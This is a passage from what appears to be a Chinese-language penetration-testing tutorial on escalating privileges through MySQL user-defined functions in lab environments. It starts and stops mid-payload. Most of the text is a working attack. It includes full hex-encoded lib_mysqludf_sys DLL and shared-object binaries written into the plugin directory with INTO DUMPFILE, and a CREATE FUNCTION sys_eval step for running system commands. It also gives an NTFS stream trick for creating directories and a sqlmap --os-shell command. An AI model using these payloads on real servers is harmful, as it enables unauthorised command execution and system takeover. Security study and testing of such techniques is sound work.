0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0) into dumpfile 'C:\\WINDOWS\\system32\\lib_mysqludf_sys_64.dll';

通过 dll 文件创建函数

CREATE FUNCTION sys_eval RETURNS STRING SONAME 'lib_mysqludf_sys_64.dll';

查看是否创建成功

创建成功后就可以直接执行命令了,可以看到是 admin 权限

0x05 实验环境 2

  • 系统:Windows Server 2008 R2 x64
  • 数据库:MySQL 5.1.60

5.1 利用方法

5.1.1 16进制写入

查看插件目录

show variables like '%plugin%';

如果没有这个目录,就需要自己创建,有两种方法

一是利用 webshell 来创建

二是利用 NTFS ADS 流模式突破进而创建文件夹,代码如下

# 创建lib文件夹select 'It is dll' into dumpfile 'C:\\phpstudy\\Extensions\\MySQL5.1.60\\lib::$INDEX_ALLOCATION';# 创建plugin文件夹select 'It is dll' into dumpfile 'C:\\phpstudy\\Extensions\\MySQL5.1.60\\lib\\plugin::$INDEX_ALLOCATION';

使用 NTFS ADS 流模式突破创建时会报下面这个 Error,是正常的

写一个 python 脚本将 lib_mysqludf_sys_64.dll 文件转化为16进制,代码如下

import binasciiwith open('lib_mysqludf_sys_64.dll', 'rb') as f:    content = f.read()hex1 = binascii.hexlify(content)hex = str(hex1,'utf-8')print('0x'+hex)

转化好之后再用 sql 语句写入

# 这里只能用 into dumpfile,不能用 into outfile,因为 into outfile函数会在行末端写入新行,更致命的是会转义换行符,这样的话这个二进制可执行文件就会被破坏select 0x4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000e80000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000677cbfda231dd189231dd189231dd18904dbbf89211dd18904dbbc892a1dd18904dbaa89261dd189231dd0890f1dd18904dbac89211dd18904dba089221dd18904dbab89221dd18904dba989221dd18952696368231dd189000000000000000000000000000000005045000064860300a727a15a0000000000000000f00022200b020800002000000010000000800000109f000000900000000000100000000000100000000200000400000000000000050002000000000000c000000010000000000000020000000000100000000000001000000000000000001000000000000010000000000000000000001000000098b2000008020000b0b10000e800000000b00000b00100000050000050010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000555058300000000000800000001000000000000000040000000000000000000000000000800000e0555058310000000000200000009000000012000000040000000000000000000000000000400000e02e727372630000000010000000b000000006000000160000000000000000000000000000400000c00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000332e393100555058210d240209e1e421439d3bdfb7de7400000f0f0000002a0000490000d41de9feff833a007450488b05a421000049890009a24008cd4973d20a9f109c1899cd9f34272096280fb70593666d83fdb7410b30b001c332c0c3cc00c215cc92c9ba810034716a6febcc16e46c096a471853fdbf1fa4631c0fb605591688401e41c7011e00ffed6dd62b8b63bf01750f3f42088338007506c64b26ebdc01017b4e2d632b05b9e4b228ce25227ed20cd26f1f28152ab001c3f66d7bc2bf83ec38344a43895c243084b7fff6dbd90b09ff15c71f2b4885c04c8bd87512104c24df6eaeb9608707202dc4388e897c242873edcdfd33c048c7c1ff0033fbf2ae1c120976d9b75b1af7d122e901890b2dcc00be6feb166f28e3026e404848deda7fdb29f938d87459488d0d40ee4e0e813832983de4c1eb81403281480a9ee4435e4f81503281543281563261f37d4fb0018c48804028c34c49467607744e61deed584917e49260680a703c6527cd18782056c740045cf8bf33b64342188b48048b008d4c010239bd1e77d27d8bd947107543706d8045ec1be936130309884370900a00b69dee10c8980a18bc0cb3c6b00e07103fbcb37ddb0f49a585c974066f5d17b7086d21cf93cf047424ada3b9772d7110448b6949e2fa02c2eddfba52e2ce0212498d5c3001e83f0ffce85cd7fddd5febcb418b03c60430d2470d5734b70c58d7e22d0822d34313167bb75bce2618007ca01cff56677c84842f7198f4cf16c64373870d087c8c03d6e4240f79561e541e511e7292939c4e1e4b1e481e63c2425e3e1e1fcf2784ee87c71f1da0981f4c89c68685ee44241824580f6c59897486bb86db76381764bdb900d34c18284cb0db7e302d4d8bf146e8e7b901ee9b6dc1ec04e00dda4533ed4488670beef69b4ff04c39290f8413050673f215fdcfb8b9169125ac1c088be8747b418d5508e1c9b6b13ac0e6cc177c7466a04b6640fa50669047fc3f42858e1b0b9529328d7936ce6f7d61c16c304375cd8cc74803c8f56636b724d470143e51c5ba08e1d9b68d39cc1ceb13225975ad886cdbb6f050eb258bc77004cd1930ddfe9cdb803e30e2154874229245ffb176d8827811fef5887edd4d174ebe5a0eebc18424805ec606e71ada0001380c4c38f12a10f8386c04c6f0a0581a87e792317fd3dc5cd8d6d09d58747a28f2023f73b773df3e448d48406e41b80010b3748bd1f10df7c7ed33c9ab441a5356104cefa2dbe6b66c02c8d8154e1b8d54b94c350aede98d054a75890ba3b16e3b2dbc3133d2c7d0208925183bdf19b7b3bad2c80df2199d30ac581e29eb081433c0922fb384f13be0064ceb0033c029001bb0dfb65538ec024510ff10c9196600fb6f7f6c900390483b0d89293f751148c1c11066f7dddd6fdfb87502f3dac1c910e9150aeccc405361203b8b7d1b5801a05fdcd25b0bfbeef7f685dbc905112fd005020675098d430185bb76efb6205b42c703d59b0d3c48b406634136670b1c5805b12006615bd85bc3cf55d27f6cc7c7c376fc608468e140dcfbf1c2c63831e83be141bdd20f8503ee46bb7408075ee428073c0f8e0d8de6b61b6e2bc58ed3105fdcfd3e76fb0fb12d602e0a741ef290b9e803c91d19bfdb36931d4275e841320783f802740fb9ef6dc3b31fb70eca0208e2ed0d2f2e338e740fd2111912f874491412fc18dadc0b1fd958f847df72165f1803b6bb2d701e4ad0c9eb081573ed12ecf6bedbcf2774192d06429bd72d0698fbfb66d833db891db80e871db906716fc7feb59806e5413bd5dde26541042530bb7dbbbd002c0978081e8bf3f048b93d883072b0b7920a63c7741ad64618d7d29b2f1c6b75e3eb037bf5a79a5ed6390c950cdaeb3fea1f9f7db7f08e8f080644892d312d1bc485c0678fed62771a15e5de0dd6181abe7fddbbeec7050725024585f67507b404bb833d14ddc96e73068b212a0b2d5c6f11dedd264fe3029cf12c66012d3a273e9e9ebe10c58f38d240e468ec98717a60dce91748c3b14d22190f6c20483a5adbf308505851f0dd05bbee77df3d041f208915d12695d275133915d709ed7f38c3750b5a17c61e83fa017405040add6be00275338931d39d08a3b71b0d34c84e20c574134ac68b07863db9d7a64bfc1616e0c9016b3c1a0edc83ffb092ebda1535ab311bc11bdb5b0bd80c430c1dc817084d7bf787755c0b1841ffd385ff88ff03753970f79d75094a08aeeb8d1ca51e36ec648b171028adeb06d8192ecc298adc25f3008bc3659e8793708b218b8bf8b59d9e2a4055bf15eaa3894d7afab61b01018b080724b0d67d5d902dd9c2302f5e7d0ab1485825ff4ddb960c1e92387d2eda02f101d7136fa3f875056c0cfcfa7d918844a4fd258b036983eb2f9e8e090cefc6f852a1899e2681ec880068cd760dbffe73153f156705b8c648f25845b7390cb8283d1f2c586170c339def61624eb754148b73dc6364238004044230430090e662fcf40280578254703055c73874c1c51494e7d4bb1077f4bf0eb222b8093447bdd837d738d0e83c00812d13e8d67db7b642a059b240d20902f9c5ba25b701c2a7214097bc009cc3e1e666c926724766e833572dbff0b70dc7a142f482c38b0bb2493827b8ef083d2396a14019b15650ccb36dc9255b624c80a271b83d76c1854ba6a234e336b1784f781c4aca041592947a626231c0fd8cf53188186d9ef0d68295a4a148a8ef8ececcdd64427cb1366eb75b908674b32d21dea902d3a1c1128106464200a8b83af334463971bcb36e418c323db83a238243d05f62809993959b611402bdc678c90c136de1bc3017f37320296247f15f4f6120d6276d81bc00383e8013c2075643f289c8d3d53041a787f4b8d1d4c068d13a08491790ec372b3326129a9ef4f137f2344720cc96681394d5a75fcb7c3ff174863513c813c0a5045e1137c0a180b020f94c063e343029f4c63413cfec9b4ebed8d7ed24c03c1413c4014450458064525ffc25f6a4ab10018741f8b510b3bd2720a8b4108ed6ff8db03c209d072104183c113c128453bcb72e16fc796b05d1cc1c3cf4cc1267af7446992e1da85dcbd1f4c2bc15feafb5abed0140ccd0f3a24c1e81f600d2cfef7d083e001eb02584fd644ab360196ebcac0b66c3008eec18b01a7ffaa128d3cc77627252205cc11ce78dca606cb113f75463da70ff0dd4603241b471eb801000000277c29847f3fe520000081bff83c3dfc32a2df2d992b7dc7f83074149d6fa3d00e7f5dc6268b2dc285586b212430bc6286b6489934e10ab9b4c856e04671d849460bb50e731c0eb110d9be10a8d813fe6a4cb84c33dbceb8ff00856037ba1623e9b8338975dde016b1df744d44d89c1d39b705dbdd8449f7d3093720d2fbdc4b4646463605dee0e2e4b24746465e505a11000055c9a8aa298064547fb017d8069017303007d04e6f206172ffffdffe67756d656e7473096c6c6f77656420287564663a206c69625f6d79730bf6b7dd716c0d5f73085f696e666f29411c80edff232076657273696f6e20302e0134ededee17a178706563744b657861076c79201a6dbb7dfb652073747243672074791b2070766175d8299b6d21724f2f7477996d60010b1f438ef6f603fb72206e616d4c436f756c246e6f74cce8b66d3b63611320186d27796372ff850740310106023532023001240d0024f6ffb7ffd407001fc408001a740b15640c0010540b000b340a0004822776bbdcfe1918090018c40f13740e640b093427b763d4ed046217d41e5e3f1903241aedbacf2c5007390f2a07801abbdc6e8367165b16743711640c340b7bd85b770442130c390c01118350118b9b6df705530133871c03e4001d5d90ed60430e057b743f09baeeb0d80401072f67079403a06077dbc10701462f462b1074092f0db6d94e3416033b01000715bb0bb6bd971574062f64f7df21000884ddb640ae043439741f00bf20eeecedb6140629034c341f0ba903e1c2debe240f05c305340a13234bd36d9b6e23431e14c45f0f470a75b713760554094b01098909a2071e7de572bb1f1e742f12640d34870142b71582bb2e1311cf0c03ca96dd0e01380f387427005124a3aafec10246ddcd5d20d266d4ff555516c900178fa02a1b003011764bd56c039180bfa007e0126dd79ddd03703407f803680b0013026a76fbba8603540b14021814170b581590fb2f07d9eeecf60a150310340727030034075bd5b9dd7003e0336f0724b3cc755dd7750b30074203ac0b9007f5b61b94db03c03233920c1903c8ba05a0eb0b10074f8be80b508375afeb077303444707990ba0b65dd77507e503280bf0073a1c033c0038b7eb0b5007f71ca70b77b63bdb8b191d2f2007381dcb40071dac7b5d83036c8307d30b601e9ded5eb3039b7c5f07c11e3be0d0ae3bdb07031f3b1007d6039c33ca1255954a005525a3aaa8aa9251645455c9d09ba0887c0402c4ff16360157616974466f7253ac7f2b40fc6c654f626abd14566972747561f63703c46c419a0d536574456e76126dbf01e26f6ee45661726961622b41eb2e40bc18437265b8546806640df65bf76d47264375727222502a636573734914e283cd1226135469636bb6fd6e03026e6b517565727950036684dedbb1f66d616e3716657218446973676fdbdbcf374c6962727879436192731a52746c633bb76d0970a2722d2c7874124cbdb5adfd6f6f6b7570463ec26916b2747279dfb5078b17cd556e77e47e4973446562736f6bed75676763a7a56583e11dfeb6b77268616e64457883704046696ca56c85c58719f19319dab61254176d65151153daf6586b39352b537973176dfa81e87517454173426509a3dbfe434388a0895f616d73675fcc6990b3850bbf5f5f435f73708b6966285f7e267cdb766f5f64116f035f706f6922430b76db2663da5f64ce280009626b31142d325f7a13c417840b5f7b50705b6c735f330a6c212205db5accd82a58096e73ed6bc982130fd76d643ed6bad6de756c343f15416d170cdea3e0020ab52689a3b565c933a196063bc16db15b0772652508661115080d5ba1739c29709f73149bb5adb93932ae6e074d0f85d7badbc56f736a663a70105e3b84ed70705831747b6d343fdf15f4c700f08c21180800e264860600a76efb0fe327a15ae6f00022200b020808120cb07744b314132e0010000005cf1e6c9b02020433050002088000c302f663146d160100022e063af76c650f0a50394330908de8db88223c1460e2d880d4bd0118020183703aacbb024b00303a011e4644a42b2e1054822d3bd810901200dc00b3dbc63b6f602e7264a76108550b53597761dd000c03162740022e26291b61f600d805100c22273616ececc02e702850eb27244fd820fc007273726300136027b3c7013226650942fca664b0702728421b4036c08d6d05ca7212d3060000000000009000ff0048894c240848895424104c8944241880fa010f854502000053565755488d35cdf0ffff488dbe0080ffff5731db31c94883cdffe85000000001db7402f3c38b1e4883eefc11db8a16f3c3488d042f83f9058a1076214883fdfc771b83e9048b104883c00483e9048917488d7f0473ef83c1048a10741048ffc0881783e9018a10488d7f0175f0f3c3fc415beb0848ffc6881748ffc78a1601db750a8b1e4883eefc11db8a1672e68d410141ffd311c001db750a8b1e4883eefc11db8a1673eb83e8037217c1e0080fb6d209d048ffc683f0ff0f843a0000004863e88d410141ffd311c941ffd311c9751889c183c00241ffd311c901db75088b1e4883eefc11db73ed4881fd00f3ffff11c1e83affffffeb835e4889f7b900120000b2004889fbeb2c8a074883c7013c80720a3c8f7706807ffe0f74062ce83c0177233817751f8b072500ffffff0fc829f801d8ab4883e9048a074883c70148ffc975d9eb0548ffc975be4883ec28488dbe007000008b0709c0744f8b5f04488d8c30b0a100004801f34883c708ff96eca1000048958a0748ffc708c074d74889f94889faffc8f2ae4889e9ff96f4a100004809c074094889034883c308ebd64883c4285d5f5e5b31c0c34883c4284883c704488d5efc31c08a0748ffc709c074233cef77114801c3488b03480fc84801f0488903ebe0240fc1e010668b074883c702ebe1488baefca10000488dbe00f0ffffbb00100000504989e141b8040000004889da4889f94883ec20ffd5488d871702000080207f8060287f4c8d4c24204d8b014889da4889f9ffd54883c4285d5f5e5b488d4424806a004839c475f94883ec804c8b442418488b542410488b4c2408e91f79ffff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000040000000000010018000000180000800000000000000000040000000000010002000000300000800000000000000000040000000000010009040000480000005cb0000054010000e404000000000000586000003c617373656d626c7920786d6c6e733d2275726e3a736368656d61732d6d6963726f736f66742d636f6d3a61736d2e763122206d616e696665737456657273696f6e3d22312e30223e0d0a20203c646570656e64656e63793e0d0a202020203c646570656e64656e74417373656d626c793e0d0a2020202020203c617373656d626c794964656e7469747920747970653d2277696e333222206e616d653d224d6963726f736f66742e564338302e435254222076657273696f6e3d22382e302e35303630382e30222070726f636573736f724172636869746563747572653d22616d64363422207075626c69634b6579546f6b656e3d2231666338623362396131653138653362223e3c2f617373656d626c794964656e746974793e0d0a202020203c2f646570656e64656e74417373656d626c793e0d0a20203c2f646570656e64656e63793e0d0a3c2f617373656d626c793e0000000000000000000000002cb20000ecb1000000000000000000000000000039b200001cb20000000000000000000000000000000000000000000044b200000000000052b200000000000062b200000000000072b200000000000080b200000000000000000000000000008eb200000000000000000000000000004b45524e454c33322e444c4c004d5356435238302e646c6c00004c6f61644c69627261727941000047657450726f634164647265737300005669727475616c50726f7465637400005669727475616c416c6c6f6300005669727475616c46726565000000667265650000000000000000a727a15a0000000074b30000010000001200000012000000c0b2000008b3000050b300007010000060100000001000008015000060100000701500002014000060100000901300000014000060100000901300003011000060100000c010000000130000e0120000a011000089b300009fb30000bcb30000d7b30000e3b30000f6b3000007b4000010b4000020b400002eb4000037b4000047b4000055b400005db400006cb4000079b4000081b4000090b4000000000100020003000400050006000700080009000a000b000c000d000e000f00100011006c69625f6d7973716c7564665f7379732e646c6c006c69625f6d7973716c7564665f7379735f696e666f006c69625f6d7973716c7564665f7379735f696e666f5f6465696e6974006c69625f6d7973716c7564665f7379735f696e666f5f696e6974007379735f62696e6576616c007379735f62696e6576616c5f6465696e6974007379735f62696e6576616c5f696e6974007379735f6576616c007379735f6576616c5f6465696e6974007379735f6576616c5f696e6974007379735f65786563007379735f657865635f6465696e6974007379735f657865635f696e6974007379735f676574007379735f6765745f6465696e6974007379735f6765745f696e6974007379735f736574007379735f7365745f6465696e6974007379735f7365745f696e69740000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 into dumpfile 'C:\\phpstudy\\Extensions\\MySQL5.1.60\\lib\\plugin\\lib_mysqludf_sys_64.dll';

通过 dll 文件创建函数

CREATE FUNCTION sys_eval RETURNS STRING SONAME 'lib_mysqludf_sys_64.dll';

创建成功后就可以直接执行命令了,可以看到是 admin 权限

5.1.2 ascii码写入

这里跟 实验环境 1 是一样的操作

5.1.3 sqlmap

使用以下命令进行提权

sqlmap -d "mysql://evil:Abcd1234@192.168.26.135:3306/mysql" --os-shell

选择了正确的位数后便能提权成功,可以看到是 admin 权限

0x06 实验环境 3

  • 系统:Windows Server 2008 R2 x64
  • 数据库:MySQL 5.5.29

6.1利用方法

6.1.1 16进制写入

与 实验环境 2 一样

6.1.2 ascii 码写入

与 实验环境 2 一样

6.1.3 sqlmap

与 实验环境 2 一样

0x07 实验环境 4

  • 系统:Windows Server 2008 R2 x64
  • 数据库:MySQL 5.7.26

7.1 利用方法

7.1.1 16进制写入

与 实验环境 2 一样

7.1.2 ascii 码写入

与 实验环境 2 一样

7.1.3 sqlmap

与 实验环境 2 一样

7.2 插件目录

与前面不同的是,这里只能通过 webshell 或者其他方法来创建插件目录,无法通过 NTFS ADS 流模式突破来创建,会提示权限不足,如图,但写文件是可以的

0x08 实验环境 5

  • 系统:CentOS 7.9 x64
  • 数据库:MySQL 5.5.62

查看插件目录

如果没有这个目录,webshell 权限够的话可以通过 webshell 来建立

8.1 利用方法

8.1.1 16进制写入

写一个 python 脚本将 lib_mysqludf_sys_64.so 文件转化为16进制,代码如下

import binasciiwith open('lib_mysqludf_sys_64.so', 'rb') as f:    content = f.read()hex1 = binascii.hexlify(content)hex = str(hex1,'utf-8')print('0x'+hex)

转化好之后再用 sql 语句写入

select 0x7f454c4602010100000000000000000003003e0001000000d00c0000000000004000000000000000e8180000000000000000000040003800050040001a00190001000000050000000000000000000000000000000000000000000000000000001415000000000000141500000000000000002000000000000100000006000000181500000000000018152000000000001815200000000000700200000000000080020000000000000000200000000000020000000600000040150000000000004015200000000000401520000000000090010000000000009001000000000000080000000000000050e57464040000006412000000000000641200000000000064120000000000009c000000000000009c00000000000000040000000000000051e5746406000000000000000000000000000000000000000000000000000000000000000000000000000000000000000800000000000000250000002b0000001500000005000000280000001e000000000000000000000006000000000000000c00000000000000070000002a00000009000000210000000000000000000000270000000b0000002200000018000000240000000e00000000000000040000001d0000001600000000000000130000000000000000000000120000002300000010000000250000001a0000000f000000000000000000000000000000000000001b00000000000000030000000000000000000000000000000000000000000000000000002900000014000000000000001900000020000000000000000a00000011000000000000000000000000000000000000000d0000002600000017000000000000000800000000000000000000000000000000000000000000001f0000001c0000000000000000000000000000000000000000000000020000000000000011000000140000000200000007000000800803499119c4c93da4400398046883140000001600000017000000190000001b0000001d0000002000000022000000000000002300000000000000240000002500000027000000290000002a00000000000000ce2cc0ba673c7690ebd3ef0e78722788b98df10ed871581cc1e2f7dea868be12bbe3927c7e8b92cd1e7066a9c3f9bfba745bb073371974ec4345d5ecc5a62c1cc3138aff36ac68ae3b9fd4a0ac73d1c525681b320b5911feab5fbe120000000000000000000000000000000000000000000000000000000003000900a00b0000000000000000000000000000010000002000000000000000000000000000000000000000250000002000000000000000000000000000000000000000e0000000120000000000000000000000de01000000000000790100001200000000000000000000007700000000000000ba0000001200000000000000000000003504000000000000f5000000120000000000000000000000c2010000000000009e010000120000000000000000000000d900000000000000fb000000120000000000000000000000050000000000000016000000220000000000000000000000fe00000000000000cf000000120000000000000000000000ad00000000000000880100001200000000000000000000008000000000000000ab010000120000000000000000000000250100000000000010010000120000000000000000000000dc00000000000000c7000000120000000000000000000000c200000000000000b5000000120000000000000000000000cc02000000000000ed000000120000000000000000000000e802000000000000e70000001200000000000000000000009b00000000000000c200000012000000000000000000000028000000000000008001000012000b007a100000000000006e000000000000007500000012000b00a70d00000000000001000000000000001000000012000c00781100000000000000000000000000003f01000012000b001a100000000000002d000000000000001f01000012000900a00b0000000000000000000000000000c30100001000f1ff881720000000000000000000000000009600000012000b00ab0d00000000000001000000000000007001000012000b0066100000000000001400000000000000cf0100001000f1ff981720000000000000000000000000005600000012000b00a50d00000000000001000000000000000201000012000b002e0f0000000000002900000000000000a301000012000b00f71000000000000041000000000000003900000012000b00a40d00000000000001000000000000003201000012000b00ea0f0000000000003000000000000000bc0100001000f1ff881720000000000000000000000000006500000012000b00a60d00000000000001000000000000002501000012000b00800f0000000000006a000000000000008500000012000b00a80d00000000000003000000000000001701000012000b00570f00000000000029000000000000005501000012000b0047100000000000001f00000000000000a900000012000b00ac0d0000000000009a000000000000008f01000012000b00e8100000000000000f00000000000000d700000012000b00460e000000000000e800000000000000005f5f676d6f6e5f73746172745f5f005f66696e69005f5f6378615f66696e616c697a65005f4a765f5265676973746572436c6173736573006c69625f6d7973716c7564665f7379735f696e666f5f6465696e6974007379735f6765745f6465696e6974007379735f657865635f6465696e6974007379735f6576616c5f6465696e6974007379735f62696e6576616c5f696e6974007379735f62696e6576616c5f6465696e6974007379735f62696e6576616c00666f726b00737973636f6e66006d6d6170007374726e6370790077616974706964007379735f6576616c006d616c6c6f6300706f70656e007265616c6c6f630066676574730070636c6f7365007379735f6576616c5f696e697400737472637079007379735f657865635f696e6974007379735f7365745f696e6974007379735f6765745f696e6974006c69625f6d7973716c7564665f7379735f696e666f006c69625f6d7973716c7564665f7379735f696e666f5f696e6974007379735f657865630073797374656d007379735f73657400736574656e76007379735f7365745f6465696e69740066726565007379735f67657400676574656e76006c6962632e736f2e36005f6564617461005f5f6273735f7374617274005f656e6400474c4942435f322e322e35000000000000000000020002000200020002000200020002000200020002000200020002000200020001000100010001000100010001000100010001000100010001000100010001000100010001000100010001000100000001000100b20100001000000000000000751a690900000200d401000000000000801720000000000008000000000000008017200000000000d01620000000000006000000020000000000000000000000d81620000000000006000000030000000000000000000000e016200000000000060000000a00000000000000000000000017200000000000070000000400000000000000000000000817200000000000070000000500000000000000000000001017200000000000070000000600000000000000000000001817200000000000070000000700000000000000000000002017200000000000070000000800000000000000000000002817200000000000070000000900000000000000000000003017200000000000070000000a00000000000000000000003817200000000000070000000b00000000000000000000004017200000000000070000000c00000000000000000000004817200000000000070000000d00000000000000000000005017200000000000070000000e00000000000000000000005817200000000000070000000f00000000000000000000006017200000000000070000001000000000000000000000006817200000000000070000001100000000000000000000007017200000000000070000001200000000000000000000007817200000000000070000001300000000000000000000004883ec08e827010000e8c2010000e88d0500004883c408c3ff35320b2000ff25340b20000f1f4000ff25320b20006800000000e9e0ffffffff252a0b20006801000000e9d0ffffffff25220b20006802000000e9c0ffffffff251a0b20006803000000e9b0ffffffff25120b20006804000000e9a0ffffffff250a0b20006805000000e990ffffffff25020b20006806000000e980ffffffff25fa0a20006807000000e970ffffffff25f20a20006808000000e960ffffffff25ea0a20006809000000e950ffffffff25e20a2000680a000000e940ffffffff25da0a2000680b000000e930ffffffff25d20a2000680c000000e920ffffffff25ca0a2000680d000000e910ffffffff25c20a2000680e000000e900ffffffff25ba0a2000680f000000e9f0feffff00000000000000004883ec08488b05f50920004885c07402ffd04883c408c390909090909090909055803d900a2000004889e5415453756248833dd809200000740c488b3d6f0a2000e812ffffff488d05130820004c8d2504082000488b15650a20004c29e048c1f803488d58ff4839da73200f1f440000488d4201488905450a200041ff14c4488b153a0a20004839da72e5c605260a2000015b415cc9c3660f1f8400000000005548833dbf072000004889e57422488b05530920004885c07416488d3da70720004989c3c941ffe30f1f840000000000c9c39090c3c3c3c331c0c3c341544883c9ff4989f455534883ec10488b4610488b3831c0f2ae48f7d1488d69ffe8b6feffff83f80089c77c61754fbf1e000000e803feffff488d70ff4531c94531c031ffb921000000ba07000000488d042e48f7d64821c6e8aefeffff4883f8ff4889c37427498b4424104889ea4889df488b30e852feffffffd3eb0cba0100000031f6e802feffff31c0eb05b8010000005a595b5d415cc34157bf00040000415641554531ed415455534889f34883ec1848894c24104c89442408e85afdffffbf010000004989c6e84dfdffffc600004889c5488b4310488d356a030000488b38e814feffff4989c7eb374c89f731c04883c9fff2ae4889ef48f7d1488d59ff4d8d641d004c89e6e8ddfdffff4a8d3c284889da4c89f64d89e54889c5e8a8fdffff4c89fabe080000004c89f7e818fdffff4885c075b44c89ffe82bfdffff807d0000750a488b442408c60001eb1f42c6442dff0031c04883c9ff4889eff2ae488b44241048f7d148ffc94889084883c4184889e85b5d415c415d415e415fc34883ec08833e014889d7750b488b460831d2833800740e488d353a020000e817fdffffb20188d05ec34883ec08833e014889d7750b488b460831d2833800740e488d3511020000e8eefcffffb20188d05fc3554889fd534889d34883ec08833e027409488d3519020000eb3f488b46088338007409488d3526020000eb2dc7400400000000488b4618488b384883c70248037808e801fcffff31d24885c0488945107511488d351f0200004889dfe887fcffffb20141585b88d05dc34883ec08833e014889f94889d77510488b46088338007507c6010131c0eb0e488d3576010000e853fcffffb0014159c34154488d35ef0100004989cc4889d7534889d34883ec08e832fcffff49c704241e0000004889d8415a5b415cc34883ec0831c0833e004889d7740e488d35d5010000e807fcffffb001415bc34883ec08488b4610488b38e862fbffff5a4898c34883ec28488b46184c8b4f104989f2488b08488b46104c89cf488b004d8d4409014889c6f3a44c89c7498b4218488b0041c6040100498b4210498b5218488b4008488b4a08ba010000004889c6f3a44c89c64c89cf498b4218488b400841c6040000e867fbffff4883c4284898c3488b7f104885ff7405e912fbffffc3554889cd534c89c34883ec08488b4610488b38e849fbffff4885c04889c27505c60301eb1531c04883c9ff4889d7f2ae48f7d148ffc948894d00595b4889d05dc39090909090909090554889e5534883ec08488b05c80320004883f8ff7419488d1dbb0320000f1f004883eb08ffd0488b034883f8ff75f14883c4085bc9c390904883ec08e86ffbffff4883c408c345787065637465642065786163746c79206f6e6520737472696e67207479706520706172616d657465720045787065637465642065786163746c792074776f20617267756d656e747300457870656374656420737472696e67207479706520666f72206e616d6520706172616d6574657200436f756c64206e6f7420616c6c6f63617465206d656d6f7279006c69625f6d7973716c7564665f7379732076657273696f6e20302e302e34004e6f20617267756d656e747320616c6c6f77656420287564663a206c69625f6d7973716c7564665f7379735f696e666f290000011b033b980000001200000040fbffffb400000041fbffffcc00000042fbffffe400000043fbfffffc00000044fbffff1401000047fbffff2c01000048fbffff44010000e2fbffff6c010000cafcffffa4010000f3fcffffbc0100001cfdffffd401000086fdfffff4010000b6fdffff0c020000e3fdffff2c02000002feffff4402000016feffff5c02000084feffff7402000093feffff8c0200001400000000000000017a5200017810011b0c070890010000140000001c00000084faffff01000000000000000000000014000000340000006dfaffff010000000000000000000000140000004c00000056faffff01000000000000000000000014000000640000003ffaffff010000000000000000000000140000007c00000028faffff030000000000000000000000140000009400000013faffff01000000000000000000000024000000ac000000fcf9ffff9a00000000420e108c02480e18410e20440e3083048603000000000034000000d40000006efaffffe800000000420e10470e18420e208d048e038f02450e28410e30410e38830786068c05470e50000000000000140000000c0100001efbffff2900000000440e100000000014000000240100002ffbffff2900000000440e10000000001c0000003c01000040fbffff6a00000000410e108602440e188303470e200000140000005c0100008afbffff3000000000440e10000000001c00000074010000a2fbffff2d00000000420e108c024e0e188303470e2000001400000094010000affbffff1f00000000440e100000000014000000ac010000b6fbffff1400000000440e100000000014000000c4010000b2fbffff6e00000000440e300000000014000000dc01000008fcffff0f00000000000000000000001c000000f4010000fffbffff4100000000410e108602440e188303470e2000000000000000000000ffffffffffffffff0000000000000000ffffffffffffffff000000000000000000000000000000000100000000000000b2010000000000000c00000000000000a00b0000000000000d00000000000000781100000000000004000000000000005801000000000000f5feff6f00000000a00200000000000005000000000000006807000000000000060000000000000060030000000000000a00000000000000e0010000000000000b0000000000000018000000000000000300000000000000e81620000000000002000000000000008001000000000000140000000000000007000000000000001700000000000000200a0000000000000700000000000000c0090000000000000800000000000000600000000000000009000000000000001800000000000000feffff6f00000000a009000000000000ffffff6f000000000100000000000000f0ffff6f000000004809000000000000f9ffff6f0000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000401520000000000000000000000000000000000000000000ce0b000000000000de0b000000000000ee0b000000000000fe0b0000000000000e0c0000000000001e0c0000000000002e0c0000000000003e0c0000000000004e0c0000000000005e0c0000000000006e0c0000000000007e0c0000000000008e0c0000000000009e0c000000000000ae0c000000000000be0c0000000000008017200000000000004743433a202844656269616e20342e332e322d312e312920342e332e3200004743433a202844656269616e20342e332e322d312e312920342e332e3200004743433a202844656269616e20342e332e322d312e312920342e332e3200004743433a202844656269616e20342e332e322d312e312920342e332e3200004743433a202844656269616e20342e332e322d312e312920342e332e3200002e7368737472746162002e676e752e68617368002e64796e73796d002e64796e737472002e676e752e76657273696f6e002e676e752e76657273696f6e5f72002e72656c612e64796e002e72656c612e706c74002e696e6974002e74657874002e66696e69002e726f64617461002e65685f6672616d655f686472002e65685f6672616d65002e63746f7273002e64746f7273002e6a6372002e64796e616d6963002e676f74002e676f742e706c74002e64617461002e627373002e636f6d6d656e7400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f00000005000000020000000000000058010000000000005801000000000000480